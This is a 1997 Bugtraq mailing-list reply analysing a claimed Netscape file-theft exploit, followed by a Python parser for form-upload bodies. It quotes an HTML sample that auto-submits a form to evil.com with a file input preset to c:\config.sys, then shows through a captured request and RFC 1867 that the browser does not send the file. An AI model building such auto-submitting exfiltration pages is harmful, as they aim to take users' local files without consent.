Bugtraq mailing list archives
Re: Netscape Exploit
From: espel () LLAIC UNIV-BPCLERMONT FR (Roger Espel Llima)
Date: Sun, 15 Jun 1997 00:16:45 +0200
On Sat, Jun 14, 1997 at 07:21:30PM -0500, root wrote:

> Here is a sample it isn't complete but you get the basic idea of what is going on
>
> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> <BODY onLoad="daForm.submit()">

That should be "document.daForm.submit()".

> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">

It doesn't seem to be this simple; with this fragment, Netscape never sends the file's contents, but only the words "Save this document in your hard drive" as well as the selected file's name, all in an url-encoded POST request. The file's contents aren't sent at all.

I tried to do something similar, with inputs of type "file" and given default "value" values, and Netscape (3.01) has been consistently ignoring them. Here's what the server gets, with this:

    POST / HTTP/1.0
    Referer: file:/path/to/attempted/exploit.html
    Connection: Keep-Alive
    User-Agent: Mozilla/3.01 (X11; I; SunOS 4.1.3_U1 sun4m)
    Host: localhost:7777
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Content-type: application/x-www-form-urlencoded
    Content-length: 72

    Save+This+Document+on+your%0AHarddrive=&recipient=foo () bar org

Adding the attribute ENCTYPE="multipart/form-data" doesn't seem to help, either; it just changes the format. I haven't had any luck either with changing the value of document.daForm.save_this_... from javascript.

RFC 1867 about the form-based file upload in HTML has these security considerations:

| 8. Security Considerations
|
| It is important that a user agent not send any file that the user has
| not explicitly asked to be sent. Thus, HTML interpreting agents are
| expected to confirm any default file names that might be suggested
| with <INPUT TYPE=file VALUE="yyyy">. Never have any hidden fields be
| able to specify any file.

and Netscape Navigator (3.01) seems to follow them...

I'm willing to believe that there's a bug somewhere around there, but it's not that simple.

Roger

--
e-mail: espel () llaic univ-bpclermont fr, espel () unix bigots org
WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html
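An added example, not part of Roger's post or of any Netscape code: a small server-side parser for the two body encodings he tested (application/x-www-form-urlencoded and RFC 1867 multipart/form-data), so the receiving side can tell whether a file input actually delivered file contents or only a name. The urlencoded body is the one from the post with a placeholder address; the multipart bodies, the field name "doc" and the file "notes.txt" are constructed.

```python
import re
from urllib.parse import parse_qsl


def parse_urlencoded(body: bytes) -> dict:
    """application/x-www-form-urlencoded: name=value pairs joined by '&'.
    keep_blank_values keeps the empty file field instead of dropping it."""
    return dict(parse_qsl(body.decode("ascii"), keep_blank_values=True))


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """multipart/form-data per RFC 1867: returns {name: (filename or None, data)}.
    The CRLF preceding each '--boundary' is part of the delimiter, not of the data,
    so splitting on CRLF + '--boundary' yields each part's payload byte-exact."""
    fields = {}
    pieces = (b"\r\n" + body).split(b"\r\n--" + boundary)
    for piece in pieces[1:]:                 # pieces[0] is the (empty) preamble
        if piece.startswith(b"--"):          # closing delimiter '--boundary--'
            break
        headers, _, data = piece[2:].partition(b"\r\n\r\n")   # drop leading CRLF
        name = re.search(rb'[;\s]name="([^"]*)"', headers)   # won't match filename=
        fname = re.search(rb'filename="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode()] = (fname.group(1).decode() if fname else None, data)
    return fields


def uploaded_files(fields: dict) -> list:
    """Names of file parts that really carry bytes, i.e. the user actually picked a file.
    A part with an empty filename and no data is what an ignored default VALUE produces."""
    return [n for n, (fname, data) in fields.items() if fname is not None and data]


# Constructed sample 1: the urlencoded body from the post (address is a placeholder).
URLENCODED_BODY = b"Save+This+Document+on+your%0AHarddrive=&recipient=foo%40example.org"

# Constructed sample 2: same form with ENCTYPE="multipart/form-data" and VALUE ignored.
BOUNDARY = b"XXboundaryXX"
MULTIPART_EMPTY = (
    b"--XXboundaryXX\r\n"
    b'Content-Disposition: form-data; name="doc"; filename=""\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"\r\n--XXboundaryXX\r\n"
    b'Content-Disposition: form-data; name="recipient"\r\n\r\n'
    b"foo@example.org\r\n--XXboundaryXX--\r\n"
)

# Constructed sample 3: the user explicitly chose a file, so contents arrive.
MULTIPART_CHOSEN = (
    b"--XXboundaryXX\r\n"
    b'Content-Disposition: form-data; name="doc"; filename="notes.txt"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b"hello\r\n--XXboundaryXX--\r\n"
)
```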